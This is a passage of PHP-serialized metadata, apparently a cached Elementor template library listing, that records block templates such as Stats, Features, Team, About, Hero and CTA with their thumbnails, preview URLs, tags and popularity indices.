8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443621\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"349\";s:11:\"trend_index\";s:3:\"319\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:26;a:14:{s:2:\"id\";s:4:\"5956\";s:5:\"title\";s:7:\"Stats 7\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443623\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"411\";s:11:\"trend_index\";s:3:\"373\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:27;a:14:{s:2:\"id\";s:4:\"5963\";s:5:\"title\";s:10:\"Features 7\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520443626\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"78\";s:11:\"trend_index\";s:2:\"61\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:28;a:14:{s:2:\"id\";s:4:\"5974\";s:5:\"title\";s:10:\"Features 4\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443629\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"75\";s:11:\"trend_index\";s:2:\"44\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:29;a:14:{s:2:\"id\";s:4:\"5983\";s:5:\"title\";s:10:\"Features 3\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_3.png\";s:12:\"tmpl_created\";s:10:\"1520443630\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:11:\"[\"featues\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"243\";s:11:\"trend_index\";s:3:\"286\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:30;a:14:{s:2:\"id\";s:4:\"5991\";s:5:\"title\";s:11:\"Features 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_4.png\";s:12:\"tmpl_created\";s:10:\"1520443632\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"122\";s:11:\"trend_index\";s:3:\"105\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:31;a:14:{s:2:\"id\";s:4:\"5999\";s:5:\"title\";s:7:\"Team 14\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_10.png\";s:12:\"tmpl_created\";s:10:\"1520443634\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"91\";s:11:\"trend_index\";s:2:\"70\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:32;a:14:{s:2:\"id\";s:4:\"6008\";s:5:\"title\";s:6:\"Team 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_10.png\";s:12:\"tmpl_created\";s:10:\"1520443636\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"79\";s:11:\"trend_index\";s:2:\"67\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:33;a:14:{s:2:\"id\";s:4:\"6027\";s:5:\"title\";s:7:\"About 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1-1.png\";s:12:\"tmpl_created\";s:10:\"1520443639\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-5-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"56\";s:11:\"trend_index\";s:2:\"40\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:34;a:14:{s:2:\"id\";s:4:\"6036\";s:5:\"title\";s:7:\"About 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1-1.png\";s:12:\"tmpl_created\";s:10:\"1520443641\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-6-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"98\";s:11:\"trend_index\";s:3:\"108\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:35;a:14:{s:2:\"id\";s:4:\"6044\";s:5:\"title\";s:11:\"Features 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443643\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"82\";s:11:\"trend_index\";s:2:\"79\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:36;a:14:{s:2:\"id\";s:4:\"6053\";s:5:\"title\";s:10:\"Features 1\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_5.png\";s:12:\"tmpl_created\";s:10:\"1520443645\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"170\";s:11:\"trend_index\";s:3:\"127\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:37;a:14:{s:2:\"id\";s:4:\"6063\";s:5:\"title\";s:7:\"Stats 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520443647\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"159\";s:11:\"trend_index\";s:3:\"151\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:38;a:14:{s:2:\"id\";s:4:\"6071\";s:5:\"title\";s:8:\"Stats 13\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443649\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"162\";s:11:\"trend_index\";s:3:\"160\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:39;a:14:{s:2:\"id\";s:4:\"6079\";s:5:\"title\";s:7:\"Stats 3\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_4.png\";s:12:\"tmpl_created\";s:10:\"1520443651\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"288\";s:11:\"trend_index\";s:3:\"263\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:40;a:14:{s:2:\"id\";s:4:\"6089\";s:5:\"title\";s:7:\"Stats 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443653\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"181\";s:11:\"trend_index\";s:3:\"215\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:41;a:14:{s:2:\"id\";s:4:\"6097\";s:5:\"title\";s:7:\"Stats 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443655\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"268\";s:11:\"trend_index\";s:3:\"260\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:42;a:14:{s:2:\"id\";s:4:\"6106\";s:5:\"title\";s:7:\"Stats 2\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_6.png\";s:12:\"tmpl_created\";s:10:\"1520443657\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"334\";s:11:\"trend_index\";s:3:\"280\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:43;a:14:{s:2:\"id\";s:4:\"6114\";s:5:\"title\";s:7:\"Stats 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_6.png\";s:12:\"tmpl_created\";s:10:\"1520443659\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"366\";s:11:\"trend_index\";s:3:\"346\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:44;a:14:{s:2:\"id\";s:4:\"6122\";s:5:\"title\";s:7:\"About 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2-1.png\";s:12:\"tmpl_created\";s:10:\"1520443661\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"53\";s:11:\"trend_index\";s:2:\"47\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:45;a:14:{s:2:\"id\";s:4:\"6135\";s:5:\"title\";s:8:\"About 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443663\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"89\";s:11:\"trend_index\";s:3:\"111\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:46;a:14:{s:2:\"id\";s:4:\"6144\";s:5:\"title\";s:7:\"Team 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_11.png\";s:12:\"tmpl_created\";s:10:\"1520443664\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"158\";s:11:\"trend_index\";s:3:\"118\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:47;a:14:{s:2:\"id\";s:4:\"6152\";s:5:\"title\";s:7:\"Stats 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443666\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"223\";s:11:\"trend_index\";s:3:\"158\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:48;a:14:{s:2:\"id\";s:4:\"6162\";s:5:\"title\";s:11:\"Services 31\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443668\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-31/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"323\";s:11:\"trend_index\";s:3:\"267\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:49;a:14:{s:2:\"id\";s:4:\"6170\";s:5:\"title\";s:8:\"Stats 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443670\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"327\";s:11:\"trend_index\";s:3:\"244\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:50;a:14:{s:2:\"id\";s:4:\"6178\";s:5:\"title\";s:8:\"Stats 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520443676\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"361\";s:11:\"trend_index\";s:3:\"323\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:51;a:14:{s:2:\"id\";s:4:\"6186\";s:5:\"title\";s:8:\"Stats 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443678\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"399\";s:11:\"trend_index\";s:3:\"362\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:52;a:14:{s:2:\"id\";s:4:\"6196\";s:5:\"title\";s:10:\"Features 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_6.png\";s:12:\"tmpl_created\";s:10:\"1520443680\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"106\";s:11:\"trend_index\";s:3:\"113\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:53;a:14:{s:2:\"id\";s:4:\"6204\";s:5:\"title\";s:10:\"Features 8\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_6.png\";s:12:\"tmpl_created\";s:10:\"1520443681\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"203\";s:11:\"trend_index\";s:3:\"217\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:54;a:14:{s:2:\"id\";s:4:\"6212\";s:5:\"title\";s:11:\"Features 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_7.png\";s:12:\"tmpl_created\";s:10:\"1520443684\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"88\";s:11:\"trend_index\";s:2:\"75\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:55;a:14:{s:2:\"id\";s:4:\"6220\";s:5:\"title\";s:10:\"Features 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_8.png\";s:12:\"tmpl_created\";s:10:\"1520443685\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"92\";s:11:\"trend_index\";s:3:\"114\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:56;a:14:{s:2:\"id\";s:4:\"6230\";s:5:\"title\";s:6:\"Hero 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443687\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"363\";s:11:\"trend_index\";s:3:\"360\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:57;a:14:{s:2:\"id\";s:4:\"6239\";s:5:\"title\";s:6:\"Hero 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443689\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"37\";s:11:\"trend_index\";s:2:\"24\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:58;a:14:{s:2:\"id\";s:4:\"6249\";s:5:\"title\";s:6:\"Hero 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443691\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"71\";s:11:\"trend_index\";s:2:\"82\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:59;a:14:{s:2:\"id\";s:4:\"6258\";s:5:\"title\";s:6:\"Hero 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_3.png\";s:12:\"tmpl_created\";s:10:\"1520443693\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"375\";s:11:\"trend_index\";s:3:\"379\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:60;a:14:{s:2:\"id\";s:4:\"6266\";s:5:\"title\";s:6:\"Hero 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_4.png\";s:12:\"tmpl_created\";s:10:\"1520443695\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"58\";s:11:\"trend_index\";s:2:\"35\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:61;a:14:{s:2:\"id\";s:4:\"6274\";s:5:\"title\";s:6:\"Hero 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_5.png\";s:12:\"tmpl_created\";s:10:\"1520443698\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/hero-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"99\";s:11:\"trend_index\";s:2:\"89\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:62;a:14:{s:2:\"id\";s:4:\"6017\";s:5:\"title\";s:6:\"CTA 14\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_black_14.png\";s:12:\"tmpl_created\";s:10:\"1520520331\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/cta-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"call to action\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"149\";s:11:\"trend_index\";s:3:\"137\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:63;a:14:{s:2:\"id\";s:4:\"4826\";s:5:\"title\";s:14:\"Testimonial 